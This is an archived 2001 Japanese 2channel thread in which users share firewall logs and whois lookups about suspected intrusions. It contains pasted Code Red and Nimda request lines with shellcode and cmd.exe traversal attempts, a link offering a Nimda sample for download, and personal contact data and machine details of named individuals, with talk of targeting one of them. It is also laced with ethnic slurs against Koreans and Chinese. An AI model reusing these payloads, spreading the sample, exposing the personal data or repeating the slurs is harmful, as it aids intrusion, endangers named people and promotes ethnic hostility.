1、中国(あからさまだ...)
2、韓国(ワームが多いな。まぁいいや)
3、米国(なんかランクダウン)
あとどうぞ。
中国へ行って足で追跡
しょうがないよな。
韓国じゃなくて北朝鮮・・・
あっ。同じか。
逝ってきます。
http://www.lycos.co.jp/weather/world/WK003_week.html
もない
スペイン?
あ〜さっきから中国のやつウザイ
あー。。。190回だよ・・
(`×´)丿ウザイ!!
a. [IPネットワークアドレス] 210.152.236.0-210.152.239.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corporation
m. [運用責任者] TN025JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dns1.yahoo.co.jp
p. [ネームサーバ] dnsn201.yahoo.co.jp
p. [ネームサーバ] ns.tokyonet.ad.jp
y. [通知アドレス] siteop@mail.yahoo.co.jp
y. [通知アドレス] jpnic-notify@jp.psi.net
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
yahooの鯖がnimdaにでも感染してるのかな?
I've counted 53 connections.
First connection was made to 3619 port at Tue Nov 13 15:05:43 2001
Last connection was made to 3619 port at Tue Nov 13 15:09:01 2001
I've counted 44 connections.
First connection was made to 3867 port at Tue Nov 13 17:17:23 2001
Last connection was made to 3867 port at Tue Nov 13 17:19:28 2001
I've counted 40 connections.
First connection was made to 4092 port at Tue Nov 13 17:58:06 2001
Last connection was made to 4094 port at Tue Nov 13 17:58:39 2001
210.141.108.226 から
I've counted 46 connections.
First connection was made to 3619 port at Tue Nov 13 15:05:43 2001
Last connection was made to 3619 port at Tue Nov 13 15:09:01 2001
新種の warm でも出たのか?
中国からきたやつのIPたまたまブラウザに張ってみたら
黒画面に赤字で”Chinse Hacker”とだけ書いてあって萎え。
今日になって明らかに増えてる。眠りから覚めたか?
(ICMP Echo Request ('Ping')) from 65.174.182.253.
ZoneAlarmのログ見たらこんなの出てきたんですが・・・
Pingって書いてあるけど大丈夫?
pingぐらいだったら大丈夫だよ。ZoneAlarmは警告表示ありに
しておいた方がいいよ。ただし、ポップアップがうざったいけど
ありがとう。安心したよ。
初めてPing来たからビビッタよ。
一日5回くらいしか警告こないから表示ONにするか。
それは普通の数と言えるのでしょうか?
韓国、中国が多いのですが。
ワーム、トロイぐらいしかわからないんですが・・・
ポートからも侵入できちゃうの?
ファイアーウォールのログに残ったIPアドレスを↓とかで検索すればわかる。
http://www.mse.co.jp/ip_domain/
MAC:0030BE001823
韓国ヤフォに攻撃者公開トピ作っちまおうかな?w
ていうかLEEさん乗っ取られてることに気付いてないんじゃない?
80以外のポート狙ってるのが問題。オーストラリアから来てたよ...
あとどうでもいいけど福岡市立駐車場の事務室にあるW2000はワームに
やらてるようだな。市立なんだから多少は迷惑lかけないようにしてほしい
元をたどれば結局、キムチ
試しにブラウザを開いてみたらNIMDAを送ろうとするので有り難くDLしました。
ウイルスチェック実験用に欲しい人はお早めに!(bad→exe)
気にしている人は殆ど対策済みだと思うけど。
http://ftp.sk-kaken.co.jp/readme.bad
うちに来たのもコリアだった。
2ちゃんねるで韓国がボロクソに言われる訳がわかった気がする。
211.226.197.96←逝ってよし!
ほとんどチャイナネットらしい(61.1XX系が多い?)。
本当にウザイ人種だな。
ちょっと嬉しい。
148.244.224.1
221.180.149.227
役立たずとか思ってたけどありがとうノートン先生。XP用に2002も買うよ
そしてふcこっf211.233.48.127
http://sv.cmjapan.com/
なんなんだ?
identd。接続の "所有者" の識別に使用されます。
ハッカーに多くの情報を漏らします。ポート 113 との間で
大量の接続を開始することで、 SuSE マシンをダウンさせることができます。
ノートン先生の頼もしさを再確認できたよ。
IP 211.223.11.232
もちろん最低限の対策はしていますが・・・
ところが来たんです?先程0時48分に私のPCに侵入を試みようと!!
N、インターネットセキュリティがブロックしてくれて事無きを得ました?
>49 さんのレスのIPでした。(韓国なんですね?)
今後を考えると不安です・・・
次が中国やね。
韓国はインターネット禁止!
ノートンを入れてなかったころ、散々踏み台にされてたのかなぁ・・。
韓国逝ってよし!
サーバでもない君たちのショッパイマシンなんか踏み台にするかよ
大体ブロックしたとか弾いたとか言う前にポート閉じればいいじゃん
ピンポン・ダッシュみたいなもんだから心配しなくていいよ。
@リモートホストにアクセスしてきた。
Aノートンセキュリティの地球儀マークに「!」が点滅した。
Aにはマジ怖かった。
プリインストのマカフィーの頃は大丈夫だったのかと不安になる。
今日 Re: というメールがたくさんきました。
中身は空…と、思ったら?
SONY CORPORATION OF HONG KONG LIMITEDの奴もいた。
どこの国だろう、コワヒー(w
CHINANET
ひろみからDLしてるとこるよね?
こいつしぬほどウザい
殺してくれ
ひろみから?
んースミマセン分かりません、解説をお願い致します。
おもしろくないネタだ
もっと勉強してね。
多分nimda感染に見せかけた社内クラク/アタ−クだ!
Uha!!
調べたらIANA(インターネット資源管理団体の上位組織?)からでした。
何か気持ち悪いです。
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)
inetnum: 203.204.0.0 - 203.204.127.255
netname: GIGAMEDIA
descr: Hoshin Gigamedia Center Inc.
descr: Cable-Based ISP in Taiwan.
country: TW
admin-c: HIA1-AP
tech-c: HIA1-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-HOSHIN-TW
changed: hostmaster@apnic.net 20001120
source: APNIC
role: HOSHIN IP Administrators
address: 4F, 57, Tung Hsing Rd.,
address: Taipei, Taiwan
country: TW
phone: +886-2-8768-1566 ext.1069
fax-no: +886-2-8768-2987
e-mail: johnson_liu@corp.giga.net.tw
admin-c: CWT1-AP
tech-c: JC97-AP
tech-c: MC60-AP
tech-c: JL126-AP
tech-c: SL424-AP
tech-c: CL244-AP
tech-c: TC153-AP
tech-c: JC367-AP
nic-hdl: HIA1-AP
notify: johnson_liu@corp.giga.net.tw
mnt-by: MAINT-HOSHIN-TW
changed: hostmaster@apnic.net 20001120
source: APNIC
連続5回侵入を試みようとしたバカ。
202.29.32.194
バンコク内閣情報テクノロジーオフィス
↑こいつも
フィリピン210.23.100.65と
台北台湾211.22.208.22
同朋はアフガンで戦ってるのに、
日本にクラックしとる場合かよ。
Network Name : SYBER
Connect ISP Name : NETSGO
Connect Date : 20010228
Registration Date : 20010813
[ Organization Information ]
Orgnization ID : ORG223642
Org Name : Cyberrics
State : SEOUL
Address : Room1508, Colonporestel Bldg, 45-13, Yeouido-dong,
Zip Code : 150-010
さっきから10回以上も。。ハァ
Verio, Inc. (NET-VRIO-207-071-064)
8005 South Chester Street
Englewood, CO 80112
US
チャンさんです
R
毎日攻撃されとるやん、俺(藁
country KR
メアド書かない
203.141.136.3
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.136.0-203.141.139.0
b. [ネットワーク名] INTERLINK
f. [組織名] 株式会社インターリンク
g. [Organization] Interlink Co.,Ltd.
m. [運用責任者] YT107JP
n. [技術連絡担当者] YN3315JP
p. [ネームサーバ] tegtan1.interlink.or.jp
p. [ネームサーバ] tegtan2.interlink.or.jp
y. [通知アドレス] iljpnic@interlink.ad.jp
[割当年月日] 1998/01/12
[返却年月日]
[最終更新] 2001/05/16 13:30:04 (JST)
━━━━━'), )= ☆ゴガギーン
∧_∧ヽ\ / / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
( ) 〉 〉_ _ ____ ∧_∧ ∠ おらっ!出てこい、>>キムチ
/ ⌒ ̄ / "'''"'| || (`∀´ ) \___________
| | ̄l | |/ / \
. | | | | || | | /\ヽ
| | .| | | へ//| | | |
( | .| ロ|ロ ゙!l''ヽ/,へ \|_ | | |
| .lヽ \ | | ヽ\/ \_ / ( )
| .| 〉 .〉 | | | |
/ / / / | | 〈| | |
/ / / / | | || | |
/ / / / └──┴──┘ | |
自分のもみた〜い!わくわく。
ポートスキャンとか言うなよ。
何番のポートにどういう事してきたってログ出せよ。
って、どうせネタスレだからどうでもいいか・・・
>>88
#どうせpingだろうけどね。。。
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucb
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215
CodeRedの痕跡
210.179.120.1 - - [28/Sep/2001:00:49:44 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 234
210.179.120.1 - - [28/Sep/2001:00:49:45 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:46 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:47 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:49 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:50 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:51 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:53 +0900] "GET /scripts/..チ ../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:53 +0900] "GET /sc?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:54 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:55 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:56 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
210.179.120.1 - - [28/Sep/2001:00:49:57 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
210.179.120.1 - - [28/Sep/2001:00:49:58 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:59 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
某凶悪ウィルス
M$のクソサバじゃなかったからよかったわヽ(`Д´;)ノ
IP: 211.107.30.150
NetBIOS: WORKGROUP
Node: LEEIKSEUNG
Group: WORKGROUP
MAC: 444553547777
DNS: LEEIKSEUNG
そんなものを欲しがらないで下さい
つかugサイトにRば腐るほどあるだろうが
DNS: oska6640.ppp.infoweb.ne.jp
2回きたんだ どうかたつけようか検討中
参加者募る レスまってるじぇ
どんなのが2回着た?ログ貼れ
ここから200回くらいアタックを受けてるんですけど、
何者なんでしょう?
verio.netっていうところなんですけど・・・?
ほほえましいじゃないか。
ちなみに私は一日761回アタック受けたことあるよ。
% (whois7.apnic.net)
inetnum: 61.158.34.224 - 61.158.34.255
netname: SANLIAN-NETBAR
descr: San lian netbar
country: CN
admin-c: CX58-AP
tech-c: CX58-AP
mnt-by: MAINT-CHINANET-HL
changed: chexs@public.hr.hl.cn 20001229
source: APNIC
person: CHE XUESONG
address: HEILONGJIANG Province liu chuansen
country: CN
phone: +86-0451-5630553
fax-no: +86-0451-5630553
e-mail: chexs@public.hr.hl.cn
nic-hdl: CX58-AP
mnt-by: MAINT-CHINANET-HL
changed: chexs@public.hr.hl.cn 20000804
source: APNIC
未使用ポートブロックに通信してくるのですが
これはなんですか?
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲
Windows Live OneCare 10thCare (682)
トロイで遊ぼう (504)
DNSプロトコルの脆弱性情報 漏洩する (145)
フレッツ・ウィルスクリア (366)
■Bitdefender Antivirus Free Part1 (233)
トレンドマイクロいい加減にしろ (736)
--log9.info------------------
【乃木坂46】桜井玲香応援スレ★18【キャプテン】 (844)
来年の選挙では須田あかり>玲奈になってそう (918)
【AKB48】岩立沙穂応援スレ♪part13【さっほー】 (447)
【SKE48】岩永亞美応援スレ☆9【つうちゃん】 (177)
【AKB48】菊地あやか応援スレ108.1【あやりん*Oωo】 (194)
【AKB48】まりんちゃんこと小林茉里奈応援スレ☆25 (842)
【珠理奈】W松井が好きすぎる人の為のスレ 13【玲奈】 (237)
AKBINGO! #186 (338)
【悲報】 玲奈たむがババアに処刑されるwwwww (215)
柏木と玲奈の清楚キャラが完全に崩壊したわけだけど (685)
【SKE48】アズマリオン応援スレ◆1.5号機【東李苑】 (823)
真顔フェチのやついる? (196)
【NMB48】植田碧麗応援スレ★4【みーれ】 (213)
24時間テレビに玲奈が出てると思ったらダウン症だった (332)
お前らいつから松井玲奈を嫌いになった? (703)
【乃木坂46】樋口日奈応援スレ★6【ひなちま】 (718)
--log55.com------------------
サンドウィッチマン Part259
【吉本新喜劇】座長を勇退すべきなのは小籔千豊
M-1グランプリ2018 part99
チョイチャック part1
【新喜劇】新喜劇スレの関西弁キチガイ【大嫌い】
【探偵ナイトスクープ】 降板して欲しい探偵誰?★2
【3月16日】つよっちゃん新喜劇【なんばオフ会】
村本大輔(ウーマンラッシュアワー)スレPart19(アンチ出入り厳禁)
